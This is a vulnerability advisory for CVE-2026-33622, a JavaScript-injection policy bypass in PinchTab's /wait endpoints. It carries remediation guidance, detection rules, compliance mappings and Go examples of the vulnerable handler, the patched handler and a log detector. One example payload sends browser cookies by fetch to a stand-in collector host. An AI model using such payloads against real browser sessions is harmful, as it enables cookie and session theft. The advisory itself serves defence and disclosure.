CVE-2026-33622

High ⚡ Exploit Available
Weakness type: CWE-94 (Improper Control of Generation of Code, 'Code Injection')
Published: Mar 26, 2026  ·  Modified: Apr 2, 2026  ·  Source: NVD
CVSS v3.1: 8.8 (High)
📄 Description (English)

PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.
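The mechanism in the description, as an added example and not PinchTab's own code: a minimal Go HTTP handler for the wait route with the fn-mode policy check missing (the behaviour of v0.8.3 through v0.8.5) and with it applied, beside an /evaluate handler that already enforces the guard. The request schema (a `mode` field, a `selector` mode standing in for the non-code wait modes), the `SecurityConfig` struct and the `Browser` stub are assumptions; the only things taken from the advisory are the route names, the `fn` field and the `security.allowEvaluate` setting.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// SecurityConfig carries the one policy knob named in the advisory
// (security.allowEvaluate); the Go field name is an assumption.
type SecurityConfig struct {
	AllowEvaluate bool
}

// WaitRequest is an assumed body for POST /wait and POST /tabs/{id}/wait.
// Only "fn" mode carries caller-supplied code; "selector" stands in for the
// non-code wait modes that the fix is meant to preserve.
type WaitRequest struct {
	Mode     string `json:"mode"`
	Fn       string `json:"fn,omitempty"`
	Selector string `json:"selector,omitempty"`
}

// Browser stands in for the Chrome session; it records every script that
// would have been handed to the page, so a test can see what leaked through.
type Browser struct{ Evaluated []string }

func (b *Browser) Evaluate(js string) { b.Evaluated = append(b.Evaluated, js) }

// buildWaitScript is the injection sink: the caller's expression is spliced
// verbatim into a script the browser will run. Escaping would not help; the
// expression is meant to execute, so the only real control is policy.
func buildWaitScript(fn string) string {
	return "(() => Boolean(" + fn + "))()"
}

// waitHandler returns the wait-route handler. With patched=false it reproduces
// the affected releases: fn mode reaches the browser without consulting
// AllowEvaluate. With patched=true it applies the same guard /evaluate has,
// and leaves the non-code modes untouched.
func waitHandler(cfg SecurityConfig, b *Browser, patched bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		var req WaitRequest
		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
			http.Error(w, "invalid JSON body", http.StatusBadRequest)
			return
		}
		switch req.Mode {
		case "fn":
			if patched && !cfg.AllowEvaluate {
				http.Error(w, "fn mode disabled by security.allowEvaluate", http.StatusForbidden)
				return
			}
			b.Evaluate(buildWaitScript(req.Fn)) // unpatched: policy never checked
			w.WriteHeader(http.StatusOK)
		case "selector":
			// Non-code wait: the selector is data, not script, so no policy
			// check is needed and none is added.
			if req.Selector == "" {
				http.Error(w, "selector required", http.StatusBadRequest)
				return
			}
			w.WriteHeader(http.StatusOK)
		default:
			http.Error(w, "unknown wait mode", http.StatusBadRequest)
		}
	}
}

// evaluateHandler is the endpoint that already enforced the guard in all
// affected releases; included so the two policy paths can be compared.
func evaluateHandler(cfg SecurityConfig, b *Browser) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if !cfg.AllowEvaluate {
			http.Error(w, "evaluate disabled", http.StatusForbidden)
			return
		}
		var req struct {
			Expression string `json:"expression"`
		}
		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
			http.Error(w, "invalid JSON body", http.StatusBadRequest)
			return
		}
		b.Evaluate(req.Expression)
		w.WriteHeader(http.StatusOK)
	}
}

// probe posts body to a handler in-process and returns the HTTP status.
func probe(h http.HandlerFunc, path, body string) int {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodPost, path, strings.NewReader(body))
	req.Header.Set("Content-Type", "application/json")
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	cfg := SecurityConfig{AllowEvaluate: false} // the documented default
	// Constructed payload: a "wait condition" that doubles as exfiltration.
	payload := `{"mode":"fn","fn":"fetch('https://collector.invalid/?c='+document.cookie),true"}`
	vuln := &Browser{}
	fmt.Println("unpatched /wait:", probe(waitHandler(cfg, vuln, false), "/wait", payload), "scripts run:", len(vuln.Evaluated))
	fixed := &Browser{}
	fmt.Println("patched /wait:", probe(waitHandler(cfg, fixed, true), "/wait", payload), "scripts run:", len(fixed.Evaluated))
	fmt.Println("selector wait still works:", probe(waitHandler(cfg, fixed, true), "/wait", `{"mode":"selector","selector":"#done"}`))
	fmt.Println("/evaluate with guard:", probe(evaluateHandler(cfg, fixed), "/evaluate", `{"expression":"1+1"}`))
}
```

The recorded-script stub makes the point that the fix is a policy decision, not input sanitisation: the expression exists to be executed, so there is no quoting that makes it safe, and the only correct control is refusing fn mode whenever the operator has disabled evaluation.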

🤖 AI Executive Summary

PinchTab 0.8.3 through 0.8.5 contain a security-policy bypass (CVSS 3.1 score 8.8, High): an authenticated caller can execute arbitrary JavaScript in a browser tab through POST /wait and POST /tabs/{id}/wait in fn mode even when security.allowEvaluate, which is off by default, has been left disabled. The guard exists only on POST /evaluate. Any deployment that relies on allowEvaluate=false to keep AI agents or other token holders from running code in the browser should treat that setting as ineffective on these versions. Exploitation needs a valid API token, so exposure scales with how widely tokens are distributed and whether the server is reachable from untrusted networks.

🤖 AI Intelligence Analysis Analyzed: Apr 23, 2026 05:21
🇸🇦 Saudi Arabia Impact Assessment
Saudi organizations that run PinchTab as the browser layer for AI agents are exposed wherever the server is reachable by holders of an API token. Because the automated browser is typically logged into internal portals, SaaS consoles or customer-facing systems, arbitrary JavaScript in a tab context means access to whatever those sessions can see, including cookies, page content and any action the logged-in user could take. The sectors most likely to be running agentic browser automation under Saudi regulation are SAMA-regulated financial institutions (back-office, compliance and customer-service automation), government digital-transformation programmes under NCA oversight (document processing, citizen services) and telecommunications operators using browser automation for customer analytics. The policy-bypass nature is what matters: an operator who set security.allowEvaluate to false has no effective control on these versions, so any token holder, including a compromised or prompt-injected agent workflow that holds the token, gets the code execution the operator explicitly tried to forbid.
🏢 Affected Saudi Sectors
Banking and Financial Services, Government and Public Administration, Healthcare and Medical Services, Energy and Utilities, Telecommunications, Insurance, E-commerce and Retail, Manufacturing and Industrial Automation, Education and Research, Real Estate and Property Management
🎯 MITRE ATT&CK Techniques
T1059.007 - Command and Scripting Interpreter: JavaScript (the fn expression is executed in the tab)
T1078 - Valid Accounts (exploitation requires a valid PinchTab API token)
T1190 - Exploit Public-Facing Application (only where the PinchTab server is reachable from untrusted networks)
T1213 - Data from Information Repositories (web applications the browser session is already authenticated to)
T1041 - Exfiltration Over C2 Channel (the injected script can send page data, including cookies and DOM content, to an attacker-controlled host)
⚖️ Saudi Risk Score (AI): 8.2 / 10.0
🔧 Remediation Steps (English)
IMMEDIATE ACTIONS:
1. Inventory every PinchTab instance and record its version; 0.8.3 through 0.8.5 are affected.
2. Restrict network access to affected servers to the agent hosts that need them; any token holder on a reachable network has code execution in the browser.
3. Audit who and what holds API tokens (agent frameworks, CI jobs, developer machines) and revoke any that are unneeded or unexplained.
4. Review request logs for POST /wait and POST /tabs/{id}/wait calls that select fn mode. This is only possible if request bodies are logged, because the expression travels in the body, not the URL.
5. Where the automated browser holds sessions to sensitive systems, isolate the instance from production networks until it is fixed.

PATCHING GUIDANCE:
1. Watch the PinchTab repository and release notes for a version containing the fix; the advisory says the fix applies the security.allowEvaluate check to fn mode in /wait, and no patched release was available at publication.
2. Plan the upgrade now so it can be applied as soon as a release ships.
3. Test in an isolated environment first, confirming that /wait and /tabs/{id}/wait in fn mode are refused when security.allowEvaluate is false and that the non-code wait modes still work.
4. Roll out in stages to limit disruption to agent workflows.

COMPENSATING CONTROLS (until patch available):
1. Put PinchTab behind a reverse proxy or firewall that limits which source addresses may reach it at all.
2. If a WAF or proxy can inspect JSON bodies, block POST /wait and /tabs/{id}/wait when the body selects fn mode or carries an fn field. This also blocks legitimate fn waits, which is exactly what allowEvaluate=false was meant to do; if agents genuinely need fn waits, the operator has already accepted browser code execution and should enable allowEvaluate knowingly rather than rely on the broken default.
3. Issue short-lived, narrowly scoped API tokens and rotate them.
4. Log every call to the wait endpoints with the request body (or at minimum the mode field) and alert on fn mode.
5. Segment PinchTab servers away from sensitive systems and give the browser profile no sessions it does not need.
6. Shut down instances that are not actively required.

DETECTION RULES:
1. Alert on POST /wait or /tabs/*/wait where the body selects fn mode or contains an fn field.
2. Do not rely on keyword matching inside the expression (eval, Function, setTimeout and so on); any fn expression is executed as code, so the presence of fn is the signal, not its contents.
3. Correlate by token: a token that was refused by /evaluate and then succeeds on /wait in fn mode is a policy bypass in progress.
4. If the browser side can log evaluations, correlate each evaluation with a /wait call to catch script execution on code paths that were never meant to run it.
5. Watch for outbound requests from the browser to unexpected destinations following a fn wait; exfiltration from the page runs over the browser's own network stack, not the PinchTab API.
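Detection rules 1 and 3 above as runnable logic, added here and not part of the page or of PinchTab: it walks constructed JSON request-log lines, flags POSTs to either wait route whose body selects fn mode or carries an fn field, and escalates when the same token was already refused by /evaluate. The log shape, the token labels and the assumption that a disabled /evaluate answers 403 are constructed for the example; PinchTab's real log format is not documented on this page.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
)

// AccessRecord is a constructed request-log shape (one JSON object per line).
// The one firm requirement this rule has is that the request body be logged,
// because the fn expression lives in the body, not in the path.
type AccessRecord struct {
	TS     string `json:"ts"`
	Token  string `json:"token"` // a token fingerprint or label, never the secret itself
	Method string `json:"method"`
	Path   string `json:"path"`
	Status int    `json:"status"`
	Body   string `json:"body"`
}

// waitPath matches both affected routes: /wait and /tabs/{id}/wait.
var waitPath = regexp.MustCompile(`^/(?:tabs/[^/]+/)?wait$`)

// isFnWait is the per-request rule: a POST to a wait route whose body either
// selects fn mode or carries an fn expression at all. There is deliberately
// no keyword matching on the expression; any fn is browser code execution.
func isFnWait(r AccessRecord) bool {
	if r.Method != "POST" || !waitPath.MatchString(r.Path) {
		return false
	}
	var body struct {
		Mode string `json:"mode"`
		Fn   string `json:"fn"`
	}
	if err := json.Unmarshal([]byte(r.Body), &body); err != nil {
		return false // an unparsable body is a separate hygiene alert, not this rule
	}
	return body.Mode == "fn" || body.Fn != ""
}

// Alert is one finding; Rule separates a plain fn wait from the stronger
// signal of a token that /evaluate had already refused.
type Alert struct {
	Rule, Token, Path string
}

// analyze runs both rules over log lines in order. The correlation rule
// assumes /evaluate answers 403 when security.allowEvaluate is off; the
// advisory does not state the status code, so confirm it per deployment.
func analyze(lines []string) []Alert {
	var alerts []Alert
	evaluateDenied := map[string]bool{}
	for _, line := range lines {
		var r AccessRecord
		if err := json.Unmarshal([]byte(line), &r); err != nil {
			continue
		}
		if r.Method == "POST" && r.Path == "/evaluate" && r.Status == 403 {
			evaluateDenied[r.Token] = true
		}
		if !isFnWait(r) {
			continue
		}
		rule := "fn-wait"
		if r.Status == 200 && evaluateDenied[r.Token] {
			rule = "fn-wait-after-evaluate-denied" // policy bypass in progress
		}
		alerts = append(alerts, Alert{Rule: rule, Token: r.Token, Path: r.Path})
	}
	return alerts
}

// SampleLog is constructed for this example; the bodies are JSON strings
// embedded in JSON, hence the escaped quotes.
var SampleLog = []string{
	`{"ts":"2026-03-26T09:00:01Z","token":"tok-a","method":"POST","path":"/wait","status":200,"body":"{\"mode\":\"selector\",\"selector\":\"#login\"}"}`,
	`{"ts":"2026-03-26T09:00:05Z","token":"tok-b","method":"POST","path":"/evaluate","status":403,"body":"{\"expression\":\"1+1\"}"}`,
	`{"ts":"2026-03-26T09:00:06Z","token":"tok-b","method":"POST","path":"/tabs/7/wait","status":200,"body":"{\"mode\":\"fn\",\"fn\":\"document.cookie.length>0\"}"}`,
	`{"ts":"2026-03-26T09:00:09Z","token":"tok-a","method":"POST","path":"/wait","status":200,"body":"{\"fn\":\"document.readyState==='complete'\"}"}`,
	`{"ts":"2026-03-26T09:00:10Z","token":"tok-c","method":"GET","path":"/tabs","status":200,"body":""}`,
}

func main() {
	for _, a := range analyze(SampleLog) {
		fmt.Printf("%-30s token=%s path=%s\n", a.Rule, a.Token, a.Path)
	}
}
```

On the sample, tok-b trips the escalated rule (refused by /evaluate, then a successful fn wait on a tab route) and tok-a trips the plain rule because its body carries fn without naming a mode; the selector wait and the GET produce nothing. If bodies are not logged, the best available fallback is to alert on every POST to the wait routes and tune from there.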
📋 Regulatory Compliance Mapping
🟢 NCA ECC 2024
ECC subdomain 2-2 Identity and Access Management (API token issuance, scope and revocation); 2-5 Networks Security Management (restricting and segmenting access to PinchTab servers); 2-10 Vulnerabilities Management (tracking CVE-2026-33622 and applying the fix); 2-12 Cybersecurity Event Logs and Monitoring Management (logging and alerting on the wait endpoints); 2-15 Web Application Security (handling of the fn parameter)
🔵 SAMA CSF
Cyber Security Risk Management and Compliance (risk assessment of PinchTab exposure); Cyber Security Operations and Technology: Identity and Access Management (token control), Application Security (policy enforcement on code-executing endpoints), Infrastructure Security (network restriction and segmentation), Vulnerability Management (patch tracking), Cyber Security Event Management (detection of fn waits), Cyber Security Incident Management (response if exploitation is found)
🟡 ISO 27001:2022
A.5.15 Access Control and A.5.18 Access Rights (who may hold PinchTab tokens); A.5.17 Authentication Information (token handling and rotation); A.8.2 Privileged Access Rights (tokens that grant browser code execution); A.8.5 Secure Authentication (API authentication); A.8.8 Management of Technical Vulnerabilities (tracking and patching); A.8.9 Configuration Management (security.allowEvaluate baseline); A.8.12 Data Leakage Prevention (browser sessions reachable from injected script); A.8.15 Logging and A.8.16 Monitoring Activities (detection); A.8.20 Networks Security and A.8.22 Segregation of Networks (isolation); A.8.28 Secure Coding (the missing policy check on /wait)
🟣 PCI DSS v4.0.1
1.3 Network access to and from the cardholder data environment is restricted (limiting reachability of PinchTab); 2.2 System components are configured and managed securely (allowEvaluate and related settings); 6.2.4 Protection against injection attacks in bespoke and custom software; 6.3.3 Security patches applied (once a fixed release exists); 6.4 Public-facing web applications are protected against attacks (WAF or equivalent where PinchTab is exposed); 7.2 Access to system components and data is appropriately defined and assigned (token scope); 8.6 Application and system accounts and their authentication factors are strictly managed (API tokens); 10.2 Audit logs implemented and 10.4 Audit logs reviewed (wait-endpoint logging and review); 11.4 Penetration testing (testing for policy bypasses)
📦 Affected Products / CPE (1 entry): pinchtab:pinchtab
📊 CVSS Score: 8.8 / 10.0 (High)
📊 CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: N (Network)
Attack Complexity: L (Low)
Privileges Required: L (Low; a valid API token is sufficient)
User Interaction: N (None)
Scope: U (Unchanged)
Confidentiality: H (High)
Integrity: H (High)
Availability: H (High)
📋 Quick Facts
Severity: High
CVSS Score: 8.8
CWE: CWE-94
EPSS: 0.08%
Exploit: Yes
Patch: No
Published: 2026-03-26
Source Feed: nvd
Saudi Risk Score: 8.2 / 10.0
Priority: CRITICAL
Tags: exploit-available, CWE-94